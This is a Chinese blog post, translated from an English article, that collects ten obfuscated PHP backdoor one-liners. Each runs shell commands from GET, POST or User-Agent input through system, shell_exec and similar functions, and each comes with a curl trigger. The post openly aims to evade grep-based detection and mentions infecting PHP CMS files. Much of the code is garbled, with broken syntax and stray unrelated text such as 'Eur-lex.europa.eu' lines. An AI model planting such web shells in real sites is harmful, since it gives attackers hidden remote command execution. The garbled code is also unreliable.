前言

最近我研究了一种不寻常的小技巧,特地撰写这篇文章来与大家分享。这篇文章提供了许多后门代码中使用的exit()基础知识,开箱即用。
这篇文章的关注点在于全局变量GET,POST,REQUEST。

最常用的函数

(PHP 4, PHP 5, PHP 7) 
shell_exec - Execute command via shell and return the complete output as a string
 string shell_exec (string $ cmd)
EXEC-> php -r 'shell_exec ("ls -la");'
(PHP 4, PHP 5, PHP 7) 
system - Executes an external program and shows the output
 string system (string $ command [, int & $ return_var])
EXEC-> php -r 'system ("ls -la");'
(PHP 4, PHP 5, 7 PHP) 
exec - Execute external program
 string Exec (Command String $ [, $ & array output [int & return_var $]])
EXEC-> php -r 'exec ("ls -la", $ var); print_r ($ var);'
(PHP 4, PHP 5, PHP 7) 
passthru - Execute an external program and show the raw output
 void passthru (string $ command [, int & $ return_var]) 
EXEC-> php -r 'passthru ("ls -la", $ var); '

简单的应用

shell_exec: 
 if (isset ($ _ REQUEST ['cmd'])) {$ cmd = shell_exec ($ _ REQUEST ['cmd']);
 print_r ($ cmd);} 
system: 
 if (isset ($ _ REQUEST ['cmd'])) {system ($ _ REQUEST ['cmd']); }
exec:
 if (isset ($ _ REQUEST ['cmd'])) {exec ($ _ REQUEST ['cmd']); }
passthru:
 if (isset ($ _ REQUEST ['cmd'])) {passthru ($ _ REQUEST ['cmd']); }

我们可以使用相同的函数,但要精心设计,避免使用简单的“grep-E”来显示我们的访问权限。

TIPS

在固定值中使用shellcode
可以不加节制地使用数组
本地函数的连接和变量的定义
base64_decode - encode (data), bin2hex, error_reporting (0)
使用系统上已存在的请求(GET或POST)。
研究恶意属性在系统类中的创建,创建其函数。
处理全局变量$ _SERVER的值。
研究PHP格式CMS文件的感染方法。

示例

示例01

函数:
1.ERROR_REPORTING
2.BASE64_DECODE
3.DEFINE
4.SYSTEM
5.EXIT
变量:

c3lzdGVt = system, dW5hbWUgLWE7bHM7 = uname -a; ls; , aWQ = = id

CODE:

(error_reporting (0)) ($ __ = @ base64_decode ("c3lzdGVt")) $ __ ( base64_decode ("aWQ ="))
. define ("_", "dW5hbWUgLWE7bHM7"). __ ( base64_decode (_)). exit );

执行:

curl -v ‘http://localhost/shell.php'

示例02

函数:
1.ERROR_REPORTING
2.BASE64_DECODE
3.ISSET
4.PRINT
5.SYSTEM
6.EXIT
变量:

c3lzdGVt = system

CODE:

(error_reporting (0) (= @ $ __. base64_decode ( "c3lzdGVt"))
 . print ($ __ ( Isset ($ _REQUEST [0]) REQUEST $ _ [0] NULL))?. EXIT );

执行:

curl -v ‘http://localhost/shell.php?0=id'

示例03

函数:
1.ERROR_REPORTING
2.BASE64_DECODE
3.CREATE_FUNCTION — 创建匿名函数(lambda样式)。
4.SHELL_EXEC
5.EXIT
变量:

ZWNobyhzaGVsbF9leGVjKCRfKSk7 = echo (shell_exec ($ _));

CODE:

( Error_reporting (0)) ($ _ = $ _ REQUEST [0]).
 ($ __ = @. Create_function ( '$ _' base64_decode ( "ZWNobyhzaGVsbF9leGVjKCRfKSk7"))) ($ __ ($ _) exit..);

执行:

curl -v ‘http://localhost/shell.php?0=id'

示例04

函数:
1.ERROR_REPORTING
2.VARIABLE FUNCTIONS
3.EXIT
变量:

$ _GET [1] = Function name, $ _GET [2] = command that will execute

CODE:

( Error_reporting (0) (= @ $ _ $ _ GET [1]) (.. $ _ ($ _GET [2])). EXIT );

执行:

curl -v ‘http://localhost/shell.php?1=system&2=id;uname'

示例05

函数:
1.ERROR_REPORTING
2.EXTRACT
3.GET_DEFINED_VARS
4.VARIABLE FUNCTIONS
5.DEFINE
6.EXIT
变量:

$ _REQUEST [1] = Function name, $ _REQUEST [2] = command that will execute

CODE:

( error_reporting (0)). ( extract ($ _REQUEST, EXTR_PREFIX_ALL))
($ _ = @ get_defined_vars () ['_ REQUEST']) ( define ('_', $ _ [2])) (($ _ [1] (_));

示例06

函数:

1.ERROR_REPORTING
2.EXPLODE
3.BASE64_DECODE
4.VARIABLE FUNCTIONS
5.EXIT
变量:

SFRUUF9VU0VSX0FHRU5U = HTTP_USER_AGENT

CODE:

( error_reporting (0)). ($ _ = @ explode (',', $ _ SERVER [ base64_decode ('SFRUUF9VU0VSX0FHRU5U')]))
($ _ [0] ("{$ _ [1]")). exit ;

示例07

函数:

1.ERROR_REPORTING
2.GET_DEFINED_VARS
3.VARIABLE FUNCTIONS
4.VARIABLE SHELLCODE
5.SYSTEM
6.EXIT
变量:

\x30=0, \x73=s, \x79=y, \x73=s, \x74=t, \x65=e, \x6D=m

CODE:

( error_reporting (0)). ($ _ [0] [] = @ $ _ GET ["\ x30"])
($ _ [1] [] = "\ x73") ($ _ [1] [] = "\ x79").
($ _ [1] [] = "\ x6D") ($ _ [1] [] = "\ x65").($ ___. = $ __ [0]) 
($ __ = @ get_defined_vars () ['_'] [1])
($ ___. = $ __ [1]) ($ ___. = $ __ [2]) ($ ___. = $ __ [3])
. ($ = ___ __ $ [4].) ($ = $ __ ___ [5].) (($ ___ ( "{$ _ [0] [0]}"))... EXIT );
Execution: curl -v ‘http://localhost/shell.php?0=id;uname%20-a'

示例08

函数:
1.ERROR_REPORTING
2.STR_REPLACE
3.VARIABLE FUNCTIONS
Variables:

$ _REQUEST [0] = Command that will execute

CODE:

( error_reporting (0)). ( str_replace ('$', '@', '#')
 , 's $ ## and @ # $ @ # $ @ # $ @ s $ # $ @ # $ ($ _ {$ _ REQUEST [0]}));

执行:

curl -v ‘http://localhost/shell.php?0=id

示例09

函数:

1.ERROR_REPORTING
2.STR_REPLACE
3.VARIABLE FUNCTIONS
4.SYSTEM
变量:

$ _POST [‘shellrox’] = Command that will execute

CODE:

( error_reporting (0)). ($ _ = [("\ x73 \ x79").
("\ x74 \ x65 \ x6d"), "\ x73 \ x68 \ x65 \ x6c", "\ x6c \ x72 \ x6f \ x78"
($ _ [0] ($ _ POST [$ _ [1]. $ _ [2]]));

执行:

curl -d “shellrox=id;uname -a” -X POST ‘http://localhost/shell.php'

示例10

函数:

1.NON ALPHA NUMERIC
2.VARIABLE FUNCTIONS
3.SYSTEM
CODE:

$ _ = ""; # we need a blank string to start
Eur-lex.europa.eu eur-lex.europa.eu # access part of the string to convert to an array
$ _ = $ _. ""; # convert the array into a string of "Array"
Eur-lex.europa.eu eur-lex.europa.eu # access the 0 index of the string "Array" which is "A"
# INCREASING VALUES TO FIND THE LETTERS
# IF YOU WANT TO MOUNT THE STRING SYSTEM
($ _ ++); #THE
($ _ ++); #B
($ _ ++); #W
($ _ ++); #D
# FIRST LETTER FOUND IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++);
($ _ ++); #F
($ _ ++); #G
($ _ ++); #H
($ _ ++); #I
($ _ ++); #J
($ _ ++); #K
($ _ ++); #L
# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++); # M
($ _ ++); #N
($ _ ++); #O
($ _ ++); #P
($ _ ++); #Q
($ _ ++); #R
# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++);
# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++); # T
($ _ ++); #U
($ _ ++); #V
($ _ ++); #W
($ _ ++); #X
# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++);
(Z)

# ARRAY DEBUG:
/ * Array
(
    [0] => E
    [1] => M
    [2] => S
    [3] => T
    [4] => Y
)
* /
# MOUNT STRING WITH ARRAY FIELDS $ ___  
$ ___ [2]. $ ___ [4]. $ ___ [2]. $ ___ [3]. ___ [0]. ___ [1];
# USING ANONYMOUS FUNCTION TECHNIQUE FOR IMPLEMENTATION
$ _____ ('id; uname -a');

极简版本(MINIMALIST VERSION:)

($ _ = $ _ [+] "). ($ _ ++). ($ _ = $ _.
($ _ ++). ($ _ ++). ($ _ ++) ($ _ ++).
($ _ ++). ($ _ ++). ($ _ ++). ($ _ ++).
($ _ ++). ($ _ ++). ($ _ ++). ($ _ ++).
($ _ ++). ($ _ ++). ($ _ ++).
($ ___ [] = $ _ ++). ($ _ ++)
(_____ = $ ___ [2]. $ ___ [4]. ___ [2]. ___ [3]. ___ [0]. ___ [1])
($ _____ ('id; uname -a'));

Execution: curl -v 'http://localhost/shell.php'

注意:还有成千上万的技巧,接下来我会一一撰写文章与大家分享。

参考

http://php.net/manual/en/language.operators.execution.php#language.operators.execution
http://php.net/manual/en/functions.variable-functions.php
http://php.net/manual/en/function.exec.php
http://php.net/manual/en/function.shell-exec.php
http://php.net/manual/en/function.system.php
http://php.net/manual/en/function.passthru.php
http://php.net/manual/en/function.get-defined-vars.php
http://php.net/manual/en/function.extract.php
http://php.net/manual/en/function.create-function.php
http://php.net/manual/en/function.extract.php
http://php.net/manual/en/reserved.variables.server.php
https://thehackerblog.com/a-look-into-creating-a-truley-invisible-php-shell
https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html

翻译来源:https://medium.com/@th3law/hold-the-shit-php-backdoor-for-fun-196c202c8cbf

源链接

Hacking more

...